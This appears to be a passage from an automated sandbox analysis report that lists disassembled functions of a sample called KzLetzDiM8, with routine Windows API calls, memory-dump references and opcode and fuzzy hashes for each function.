                                                            Function 002119F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002119EF,?,?,00000008,?,?,0021168F,00000000), ref: 00211C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 5a329c27d758e19e5232c6943bc8aaf44292df82038b1cdc9e6adfded6c4bb90
                                                            • Instruction ID: d94ffd44df7e5052ffa0c537e3ef6684bf5c5807f7bcc89733c3261ccb826b05
                                                            • Opcode Fuzzy Hash: 5a329c27d758e19e5232c6943bc8aaf44292df82038b1cdc9e6adfded6c4bb90
                                                            • Instruction Fuzzy Hash: 7AB16F31220609DFD715CF28C48ABA57BE0FF55364F258659E99ACF2A1C335EEA1CB40
                                                            Function 001FF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001FF66A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 4f89a4948bc9b683ddae2e43e283d3280635d1ad792a7ca09a6b585fb0195659
                                                            • Instruction ID: 1eb8bfd741721695f7e994e59611d7155eaa073976becd0fff3d5954144cfc93
                                                            • Opcode Fuzzy Hash: 4f89a4948bc9b683ddae2e43e283d3280635d1ad792a7ca09a6b585fb0195659
                                                            • Instruction Fuzzy Hash: 5B517EB5D00609CFEB29CF54EC857AAFBF4FB88354F24852AD901EB290D3B49942CB50
                                                            Function 001EB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 001EB16B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: b21a4e8f9d5b3a1e101b4ff667d7172db4dc3735bbaf17ecfab4741152b8c6c7
                                                            • Instruction ID: 1583e2b26e848e71ab6441ebd713a1dad6c705ed3256e24c20f8936a70a57a8b
                                                            • Opcode Fuzzy Hash: b21a4e8f9d5b3a1e101b4ff667d7172db4dc3735bbaf17ecfab4741152b8c6c7
                                                            • Instruction Fuzzy Hash: 9FF054B4D006489FDB28CB58FC99ADA73F2F768315F1142A5DA1593390C774AE81CE60
                                                            Function 001E40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            • Opcode ID: 929e0467df00c16eb8c5dbc3f60b398597e1142497a22143af163916a4fc5354
                                                            • Instruction ID: 78515fb53e1bf0faddea8bff4dc50017b0bd3252a57aa65b777563452bcde026
                                                            • Opcode Fuzzy Hash: 929e0467df00c16eb8c5dbc3f60b398597e1142497a22143af163916a4fc5354
                                                            • Instruction Fuzzy Hash: ABC13976A183858FC354CF29D840A5AFBE2BFC8308F15892DE998D7311D734E945CB96
                                                            Function 001FF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,001FF3A5), ref: 001FF9DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c416b1d9e5e6fefbcab1882e078f9c7bc6bc30fec6f9f5af51c3d6cac2c1b716
                                                            • Instruction ID: f798676784c94490d5f5d9c96de0300b7300322b75234627640289864ea54111
                                                            • Opcode Fuzzy Hash: c416b1d9e5e6fefbcab1882e078f9c7bc6bc30fec6f9f5af51c3d6cac2c1b716
                                                            • Instruction Fuzzy Hash:
                                                            Function 0020C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: b074ce30e986df07c8580d5e0a64eba88e8454c548b5e793fd7d884a7450a1af
                                                            • Instruction ID: f956bdd50fbfdf92b2ad3ecbeffe9c93e9124883bd6c358e36dc3d311e556b4a
                                                            • Opcode Fuzzy Hash: b074ce30e986df07c8580d5e0a64eba88e8454c548b5e793fd7d884a7450a1af
                                                            • Instruction Fuzzy Hash: E1A00174602201EB9744CF36BE4D6893AAAAA6669174A806AA909C5160EA2485A4AB01
                                                            Function 001F62CA Relevance: .8, Instructions: 829COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                            • Instruction ID: 352865a12accefcf56c0a9bb7912403f035e1d242925c5b7e20ec7114ac1e3c4
                                                            • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                            • Instruction Fuzzy Hash: E062D871604B889FCB29CF38C4906B9BBE1BF95304F09896DD9EA8B346D734E945CB11
                                                            Function 001F77EF Relevance: .8, Instructions: 817COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                            • Instruction ID: d07d05e482410d37b4ad6843a6723634b3122e71db89a4ecaa8893917d15f793
                                                            • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                            • Instruction Fuzzy Hash: 5C62FB7160C7498FCB19CF28C8909B9BBE1BFD5304F18896DE99A8B386D730E945CB15
                                                            Function 001EF461 Relevance: .7, Instructions: 694COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                            • Instruction ID: c4d3738c50e86854c83315da9e6f0f6ea26258b4a1f734668e3d5a3dd106c195
                                                            • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                            • Instruction Fuzzy Hash: A0524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                            Function 001F7153 Relevance: .5, Instructions: 536COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce92df74228eae306f6282da784ef4391deda09fde9c8428e1703ec3bbb57a81
                                                            • Instruction ID: 5a9ffdd15a7ee458b3404037a2a22be0336c63483827300faccee4912f943279
                                                            • Opcode Fuzzy Hash: ce92df74228eae306f6282da784ef4391deda09fde9c8428e1703ec3bbb57a81
                                                            • Instruction Fuzzy Hash: 3812C2B161870A9FC718CF28C890AB9B7E1FF94304F14492EEA96C7781E374E995CB45
                                                            Function 001EC426 Relevance: .5, Instructions: 454COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f93ed20eb52f331a6b6902d4d077303fee7c4fa3d64ab80b83097ccdd4126d91
                                                            • Instruction ID: d0db1d5c99c7b76d38822298212a4f2d78d4a10810d098d94ed4582cf2b704ac
                                                            • Opcode Fuzzy Hash: f93ed20eb52f331a6b6902d4d077303fee7c4fa3d64ab80b83097ccdd4126d91
                                                            • Instruction Fuzzy Hash: 71F1AD71A087818FC718CF2AC99466EBBE5EFC9318F154A2EF48597352D730D946CB82
                                                            Function 001EE9B7 Relevance: .3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7b38cfba5593a9cb237a29968060520bc16cbca4c12838bb6584da044305a10
                                                            • Instruction ID: 6d4291e9978e2dc988ec08dc35e10f4cb59ca582acf4c56d96505d249b5ec3a2
                                                            • Opcode Fuzzy Hash: b7b38cfba5593a9cb237a29968060520bc16cbca4c12838bb6584da044305a10
                                                            • Instruction Fuzzy Hash: 5BE16A755083949FC314CF69E88486ABFF1AF8A300F45495EF9C497352C334EA1ADBA2
                                                            Function 001F4088 Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                            • Instruction ID: 29073611cf4138c1a82e83785ed4c00f89f981ca911ecb072dde25d435331e07
                                                            • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                            • Instruction Fuzzy Hash: 549146B020478D8BDB28EE64E891BBF77D5EFA0304F54092DF796C7282DB64A585C352
                                                            Function 001F43BF Relevance: .2, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 38329f3a50fba427ceaa6b152ff37fd0ea3fe0faf4c69c325cee1eb0185cec9e
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 2081327170434E4BDB24EE68D8D1B7F77D4AFA1304F44092DE786CB182DB7499858751
                                                            Function 002051C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 018388020cf0fa458fb53ca2db5843eefe05bbfd86081043f98e4eb1a6036031
                                                            • Instruction ID: 3f9c99a653d3baa2bce75b1b0421484c72812632310559800f0736a93dc7cbe8
                                                            • Opcode Fuzzy Hash: 018388020cf0fa458fb53ca2db5843eefe05bbfd86081043f98e4eb1a6036031
                                                            • Instruction Fuzzy Hash: 14615631630F3A6BDF389E6858957BF2394EF42340F140959EC42DB2C3D6959D628E15
                                                            Function 00204F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                            • Instruction ID: 03a9455af226de500b19871651afc532e8daeb265fad541d1679ebdff9963160
                                                            • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                            • Instruction Fuzzy Hash: D45156B0230F2757DF346D28845ABBF67C69B09300F184819E98AC76C3C645ED358FA6
                                                            Function 001EEFE2 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4e67d6ed795a69a0d36d6d5c46ba48964088f0e31bebfa9e735ff2200f64647
                                                            • Instruction ID: d1f20e068c794c0b3fa73e32e00e070c309c434dbd6230fdcf69ba476e09f6d9
                                                            • Opcode Fuzzy Hash: b4e67d6ed795a69a0d36d6d5c46ba48964088f0e31bebfa9e735ff2200f64647
                                                            • Instruction Fuzzy Hash: 9C51B4315097D58FD712CF25C5404AEBFE1AEAA314F4A09ADE8D95B243C321DB4BCB62
                                                            Function 001F00B7 Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d78e74cfd922bc9a009d39d8af33cbb09e9f8de217b0ca2fe835ae1b53db6656
                                                            • Instruction ID: a2d640f629f0a525b078767508107301a1b8a4c9f235e78643ae33f5ad418ba0
                                                            • Opcode Fuzzy Hash: d78e74cfd922bc9a009d39d8af33cbb09e9f8de217b0ca2fe835ae1b53db6656
                                                            • Instruction Fuzzy Hash: C451DFB1A087159FC748CF19D48055AF7E1FB88314F058A2EE899E3341DB34EA59CB96
                                                            Function 001F3E0B Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
